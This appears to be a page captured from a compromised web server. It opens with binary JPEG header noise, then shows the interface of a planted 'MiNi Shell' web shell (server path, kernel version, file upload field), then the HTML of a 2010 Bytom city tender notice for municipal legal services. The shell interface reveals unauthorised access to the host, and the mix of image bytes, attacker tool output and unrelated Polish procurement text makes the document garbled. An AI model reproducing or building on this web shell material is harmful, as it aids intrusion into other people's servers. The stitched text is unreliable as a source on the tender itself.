JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/380240-N-2010.html

<p class="kh_header"><b>Bytom: Obsługa prawna komórek organizacyjnych Urzędu Miejskiego w Bytomiu</b><br>
<b>Numer ogłoszenia: 380240 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bytom reprezentowana przez Prezydenta Miasta , ul. Parkowa 2, 41-902 Bytom, woj. śląskie, tel. 032 2836301, faks 032 2836344.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa prawna komórek organizacyjnych Urzędu Miejskiego w Bytomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie bieżącej obsługi prawnej wszystkich komórek organizacyjnych Urzędu Miejskiego w Bytomiu.
2.	Obsługa prawna obejmuje w szczególności:
1/	bieżące udzielanie porad prawnych oraz wyjaśnień w zakresie stosowania prawa;
2/	sporządzanie opinii prawnych i innych opracowań na piśmie w terminie do 5 dni roboczych.  Opinia prawna winna zawierać co najmniej następujące części:
- analizę stanu prawnego,
- konkluzję zawierającą prawidłowe, zdaniem opiniującego, rozwiązanie;
3/	sygnalizowanie zapowiedzi nowych lub zmian obowiązujących przepisów związanych z funkcjonowaniem samorządu gminnego i powiatowego, 
poprzez informowanie o ww. zmianach w szczególności podczas cyklicznych spotkań z udziałem osób kierujących komórkami organizacyjnymi Urzędu Miejskiego w Bytomiu;
4/	informowanie o uchybieniach w działalności Urzędu Miejskiego w zakresie przestrzegania prawa i skutkach tych uchybień Sekretarza Miasta oraz 
w uzasadnionych przypadkach podczas cyklicznych spotkań z udziałem osób kierujących komórkami organizacyjnymi Urzędu Miejskiego w Bytomiu;
5/	uczestniczenie, na wniosek szefów poszczególnych pionów, w prowadzonych rokowaniach, których celem jest nawiązanie, zmiana lub rozwiązanie umów; 
6/	uzgadnianie i opiniowanie pod względem formalno-prawnym projektów umów, parafowanie zawieranych umów, w terminie do 3 dni roboczych. W przypadku braku możliwości uzgodnienia ostatecznej wersji dokumentu ewentualna odmowa parafowania musi być wyrażona w formie pisemnej i zawierać uzasadnienie wskazujące na rozwiązania prawidłowe pod względem prawnym;
7/	opiniowanie pod względem formalno-prawnym projektów prawa miejscowego, zarządzeń Prezydenta i innych aktów prawnych związanych z wykonywaniem zadań z zakresu administracji publicznej, w terminie do 3 dni roboczych. W przypadku braku możliwości uzgodnienia ostatecznej wersji dokumentu ewentualna odmowa parafowania musi być wyrażona w formie pisemnej i zawierać uzasadnienie wskazujące na rozwiązania prawidłowe pod względem prawnym;
8/	ewentualny udział w pracach zespołów powoływanych przez Prezydenta Miasta;
9/	uczestniczenie w sesjach Rady Miejskiej;
10/	udział w posiedzeniach komisji Rady Miejskiej na wniosek szefów pionów lub Przewodniczącego Rady;
11/	sygnalizowanie i uzgadnianie z szefami pionów spraw, które należy skierować 
do organów rozstrzygających; 
12/	współpraca z podmiotem, który w imieniu i na zlecenie Zamawiającego wykonuje zastępstwo procesowe przed sądami, trybunałami lub innymi organami orzekającymi. Do obowiązków wykonawcy należy zebranie z komórek organizacyjnych urzędu dokumentów niezbędnych do skutecznego prowadzenia spraw przed organami rozstrzygającymi. Wykonawca zobowiązany jest 
do udostępniania dokumentów umożliwiającego terminowe i prawidłowe wykonywanie reprezentacji prawnej, w terminach uzgodnionych z podmiotem wykonującym zastępstwo procesowe,;
13/	prowadzenie repertorium spraw i ewidencji spraw zleconych do załatwienia przez komórki organizacyjne Urzędu do 30.06.2011r., a najpóźniej od 01.07.2011r. prowadzenie wszelkich spraw i dokumentów w systemie elektronicznego obiegu dokumentów. Zamawiający zapewni przeszkolenie dwóch osób wskazanych przez wykonawcę z obsługi systemu.
Zmiana terminów określonych w pkt 2 może nastąpić w wyjątkowych sytuacjach, 
na pisemny lub elektroniczny wniosek Wykonawcy skierowany do wnioskujących 
o wykonanie danej czynności złożony przed upływem ww. terminów. Wnioskodawca wyznaczy ostateczny termin realizacji czynności, a w przypadkach spornych rozstrzyga Sekretarz Miasta. Opisana zmiana terminów może mieć charakter wyjątkowy i nie wymaga zmiany umowy.
3.	Wykonawca zobowiązuje się do świadczenia obsługi prawnej przez pracownika wykonawcy, posiadającego co najmniej wykształcenie prawnicze, w godzinach pracy urzędu, obecnie: w poniedziałki od godz. 7.30 do 17.30 w wymiarze 10 godzin oraz od wtorku do piątku od godz. 7.30 do 15.00 w wymiarze 7 godz. 30 min. dziennie, 
w siedzibie Zamawiającego.
4.	Wykonawca zobowiązuje się, iż w ramach powyżej wskazanego zakresu czasowego, radca prawny bądź adwokat (łącznie 3 osoby) będzie świadczył obsługę prawną: 
-	jedna osoba w wymiarze 6 godzin dziennie, tj. od o 8 do 14 każdego dnia
-	druga osoba w jednym wyznaczonym przez zamawiającego dniu w tygodniu przez 3 godziny, w siedzibie Zamawiającego, 
-	trzecia osoba w jednym wyznaczonym przez zamawiającego dniu w tygodniu przez 2 godz. 30 min. w siedzibie Zamawiającego, w Wydziale Edukacji.
W uzasadnionych przypadkach w zakresie zadań określonych w pkt 2 ppkt 1, 5, 8, 9, 10 i 12, także poza siedzibą Zamawiającego.
5.	W szczególnie uzasadnionych przypadkach osoby kierujące komórkami mogą w godzinach określonych w pkt 3 zwrócić się telefonicznie do radcy prawnego lub adwokata w celu konsultacji, a Sekretarz Miasta może wezwać radcę prawnego/adwokata działającego w imieniu Wykonawcy do stawienia się w siedzibie Zamawiającego w ciągu 60 min.
6.	Wykonawca zapewni ciągłość obsługi prawnej w okresie realizacji niniejszego zamówienia.
7.	Wykonawca zobowiązuje się do niewykonywania czynności zastępstwa procesowego na rzecz innych podmiotów w postępowaniach sądowych z udziałem Zamawiającego oraz występowania w postępowaniach toczących się przed Zamawiającym w postępowaniach administracyjnych w okresie obowiązywania umowy.

Informacje dodatkowe dotyczące funkcjonowania zamawiającego:
Ilość sesji Rady Miejskiej
w 2009 r. - 15
w 2010 r. - 18
ilość uchwał Rady Miejskiej
w 2009 r. - 255 (294 projekty)
w 2010 r. - 185 (203 projekty)
ilość posiedzeń komisji Rady Miejskiej
w 2009 r. - 174
w 2010 r. - 154
ilość zarządzeń Prezydenta Miasta 
w 2009 r. - 533
w 2010 r. - 503 (do 23 listopada)
ilość opinii prawnych wydanych w okresie ostatnich 12 miesięcy - ok. 159.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.11.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
jedną usługę polegającą na świadczeniu bieżącej obsługi prawnej miasta na prawach powiatu przez okres co najmniej 2 lat.

Zamawiający zsumuje okresy wykazanych usług w celu potwierdzenia spełnienia warunku, tj. uzyskania okresu co najmniej 2 lat, przy czym sumowaniu będą podlegały usługi trwające minimum 8 miesięcy.
Ww. usługi muszą być potwierdzone dokumentem stwierdzającym należyte wykonanie. 

W przypadku jeżeli usługa jest nadal realizowana Zamawiający w celu potwierdzenia spełnienia warunku weźmie pod uwagę okres świadczenia usługi do dnia, w którym upływa termin składania wniosków.  
Uwaga: za doświadczenie Zamawiający uzna wykonywanie obsługi prawnej w zakresie ww. warunku niezależnie od podstawy prawnej świadczenia.

Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w następujący sposób:

Sprawdzi spełnienie warunków na podstawie wymaganych dokumentów i oświadczeń.  Dokumenty weryfikowane będą wg formuły spełnia-nie spełnia. Wnioski zweryfikowane pozytywnie zostaną poddane dalszej ocenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje lub będzie dysponował co najmniej trzema osobami posiadającymi uprawnienia do wykonywania zawodu radcy prawnego zgodnie z ustawą z dnia 6 lipca 1982 r. o radcach prawnych lub zawodu adwokata zgodnie 
z ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze lub są prawnikami zagranicznymi wykonującymi stałą praktykę na podstawie ustawy z dnia 05.07.2002 roku o świadczeniu pomocy prawnej przez prawników zagranicznych w RP oraz posiadają wpis na listę potwierdzającą wykonywanie zawodu adwokata lub radcy prawnego, prowadzoną przez Radę Okręgową Izby Radców Prawnych lub Okręgową Izbę Adwokacką.

Wskazane osoby winny posiadać co najmniej 3 lata doświadczenia zawodowego w okresie od 01.01.2005 do dnia składania wniosków, polegającego na obsłudze prawnej miasta na prawach powiatu
 w tym:
a)	co najmniej dwie osoby posiadające doświadczenie, dotyczące co najmniej 10 zagadnień, spośród wymienionych poniżej:
1)	Gospodarka przestrzenna,
2)	Prawo budowlane,
3)	Obrót nieruchomościami,
4)	Prawo lokalowe,
5)	Ochrona środowiska,
6)	Ochrona zdrowia i opieka społeczna,
7)	Sprawy obywatelskie,
8)	Sprawy kadrowe,
9)	Zamówienia publiczne,
10)	Finanse publiczne,
11)	Tworzenie prawa miejscowego,
12)	Kultura i sport
13)	Pozyskiwanie i prawidłowe rozliczanie środków unijnych
14)	Nadzór nad inwestycjami
15)	Nadzór na spółkami prawa handlowego z udziałem jednostek samorządu terytorialnego;
b)	co najmniej jedną osobą posiadającą doświadczenie z zakresu zagadnień dot.  oświaty i edukacji.


Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w następujący sposób:

Sprawdzi spełnienie warunków na podstawie wymaganych dokumentów i oświadczeń.  Dokumenty weryfikowane będą wg formuły spełnia-nie spełnia. Wnioski zweryfikowane pozytywnie zostaną poddane dalszej ocenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz wniosku,
2. oświadczenie o spełnieniu warunków udziału w postępowaniu,
oraz (jeżeli dotyczy)
3. pełnomocnictwo do działania w imieniu wykonawcy (w przypadku, gdy nie jest to osoba upoważniona do reprezentowania wykonawcy z mocy prawa) lub inny dokument, z którego wynika upoważnienie do reprezentowania wykonawcy - oryginał lub kopia notarialnie poświadczona za zgodność z oryginałem
4. dokument potwierdzający ustanowienie pełnomocnika zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych (w przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia) - oryginał lub kopia notarialnie poświadczona za zgodność z oryginałem zobowiązanie podmiotu trzeciego jeżeli zachodzą okoliczności określone w art. 26 ust. 2b ustawy Prawo zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>I. Warunki udziału w postępowaniu:

1. Wykonawca winien wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
1 usługę polegającą na świadczeniu bieżącej obsługi prawnej miasta na prawach powiatu przez okres co najmniej 2 lat.

Zamawiający zsumuje okresy wykazanych usług w celu potwierdzenia spełnienia warunku, tj. uzyskania okresu co najmniej 2 lat, przy czym sumowaniu będą podlegały usługi trwające minimum 8 miesięcy.
Ww. usługi muszą być potwierdzone dokumentem stwierdzającym należyte wykonanie.

W przypadku jeżeli usługa jest nadal realizowana Zamawiający w celu potwierdzenia spełnienia warunku weźmie pod uwagę okres świadczenia usługi do dnia, w którym upływa termin składania wniosków.  
Uwaga: za doświadczenie Zamawiający uzna wykonywanie obsługi prawnej w zakresie ww. warunku niezależnie od podstawy prawnej świadczenia.

2. Wykonawca winien wykazać, że dysponuje lub będzie dysponował co najmniej trzema osobami posiadającymi uprawnienia do wykonywania zawodu radcy prawnego zgodnie 
z ustawą z dnia 6 lipca 1982 r. o radcach prawnych lub zawodu adwokata zgodnie 
z ustawą z dnia 26 maja 1982 r. Prawo o adwokaturze lub są prawnikami zagranicznymi wykonującymi stałą praktykę na podstawie ustawy z dnia 05.07.2002 roku o świadczeniu pomocy prawnej przez prawników zagranicznych w RP oraz posiadają wpis na listę potwierdzającą wykonywanie zawodu adwokata lub radcy prawnego, prowadzoną przez Radę Okręgową Izby Radców Prawnych lub Okręgową Izbę Adwokacką.

Wskazane osoby winny posiadać co najmniej 3 lata doświadczenia zawodowego w okresie od 01.01.2005 do dnia składania wniosków, polegającego na obsłudze prawnej miasta na prawach powiatu
 w tym:
a)	co najmniej dwie osoby posiadające doświadczenie, dotyczące co najmniej 10 zagadnień, spośród wymienionych poniżej:
1)	Gospodarka przestrzenna,
2)	Prawo budowlane,
3)	Obrót nieruchomościami,
4)	Prawo lokalowe,
5)	Ochrona środowiska,
6)	Ochrona zdrowia i opieka społeczna,
7)	Sprawy obywatelskie,
8)	Sprawy kadrowe,
9)	Zamówienia publiczne,
10)	Finanse publiczne,
11)	Tworzenie prawa miejscowego,
12)	Kultura i sport
13)	Pozyskiwanie i prawidłowe rozliczanie środków unijnych
14)	Nadzór nad inwestycjami
15)	Nadzór na spółkami prawa handlowego z udziałem jednostek samorządu terytorialnego;
b)	co najmniej jedną osobą posiadającą doświadczenie z zakresu zagadnień dot.  oświaty i edukacji.



II. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w następujący sposób:

Sprawdzi spełnienie warunków określonych w cz. I pkt 1 i 2 na podstawie wymaganych dokumentów i oświadczeń.  Dokumenty weryfikowane będą wg formuły spełnia-nie spełnia. Wnioski zweryfikowane pozytywnie zostaną poddane dalszej ocenie. 

Zamawiający przyzna punkty za spełnienie warunku określonego w cz.I pkt 1 w następujący sposób:

1. Obsługa miast na prawach powiatu trwająca minimum 12 miesięcy: 
a-	wykonywana w dwóch różnych miastach 			- 1 pkt
b-	wykonywana w trzech lub czterech różnych miastach 	- 2 pkt
c-	wykonywana w pięciu i większej liczbie różnych miast	- 3 pkt

2. Obsługa co najmniej jednego miasta na prawach powiatu trwająca minimum 12 miesięcy: 
 
a-	powyżej 100 tys. do 130 tys. mieszkańców	- 1 pkt
b-	powyżej 130 tys. do 160 tys. mieszkańców	- 2 pkt
c-	powyżej 160 tys. mieszkańców 		- 3 pkt,

przy czym punkty zostaną przyznane, zarówno w pkt 1 jak i 2, tylko w jednym, najkorzystniejszym przedziale tj. a lub b lub c. 
Zatem można uzyskać maksymalnie, łącznie w obu kryteriach, 6 pkt.

Do dokonania oceny w zakresie pkt 2 Zamawiający przyjmie dane z GUS na dzień 31.12.2009 r. (zgodnie z dokumentem opublikowanym na stronie Zamawiającego).

W przypadku, gdyby ocena spełnienia warunków dokonana zgodnie z ww. zasadami nie pozwoliła na wyłonienie 5 wykonawców, zostaną dodatkowo przyznane punkty za spełnienie warunku określonego w cz. I. pkt 2 lit. a, w następujący sposób:

3. Za wykazanie doświadczenia w zakresie więcej niż 10 zagadnień - 1 pkt za każde dodatkowe zagadnienie, niezależnie od tego czy potwierdza to doświadczenie jednej czy dwóch osób.  Zatem maksymalnie w tej punktacji można uzyskać 5 pkt.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem możliwości 
i warunków dokonania takiej zmiany określonych poniżej:
1)	zmiana strony umowy tj. następstwo prawne wynikające z odrębnych przepisów,
2)	zmiana wynagrodzenia brutto określonego w przypadku zmiany przepisów obowiązujących dot. podatku VAT,
3)	zmiana osób realizujących przedmiot zamówienia i wskazanych imiennie w treści umowy jeżeli zostanie wykazane, iż proponowane osoby posiadają uprawnienia i doświadczenie, co najmniej takie jak osoby wskazane przez Wykonawcę w ofercie
4)	Zamawiający przewiduje możliwość zmiany terminu wykonania poszczególnych elementów przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od stron umowy lub których strony umowy przy zachowaniu należytej staranności nie były w stanie uniknąć lub przewidzieć,
2.	Warunkiem dokonania ww. zmian jest złożenie wniosku przez stronę inicjującą wraz z opisem i uzasadnieniem proponowanej zmiany.
3.	Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.bytom.pl/<br>
